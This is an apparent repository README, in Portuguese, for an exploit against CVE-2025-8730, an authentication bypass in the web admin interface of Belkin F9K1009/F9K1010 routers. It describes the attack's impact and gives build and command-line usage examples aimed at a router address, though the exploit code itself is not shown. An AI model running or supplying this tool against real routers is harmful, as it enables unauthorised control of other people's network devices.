
Exploit demonstrando uma vulnerabilidade de bypass de autenticação na interface web dos roteadores Belkin F9K1009 e F9K1010.
Autor : Byte Reaper
Este repositório contém um exploit para CVE‑2025‑8730, uma vulnerabilidade crítica de Fuga de Autenticação que afeta a interface web dos roteadores Belkin F9K1009 e F9K1010.
A falha está na lógica de validação de sessão do arquivo /login.htm, onde cookies manipulados inadequadamente ou requisições forjadas permitem que atacantes contornem as verificações de login e obtenham acesso total à interface administrativa sem credenciais válidas.
Esta vulnerabilidade permite que atacantes remotos (com acesso à rede) possam:
Acessar dados de configuração sensíveis
Modificar configurações do roteador
Implantar cargas adicionais para persistência ou movimento lateral
Entrada NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Verbose Mode :
./CVE-2025-8730 -i 192.168.1.1 -v -c [cookie file]
Full URl :
./CVE-2025-8730 -f http://<IP>/<LOGIN_FILE>
Sleep (second):
./CVE-2025-8730 -i 192.168.1.1 -s 1
Number Request (For loop), example 10 Request POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
Licença :
Licença MIT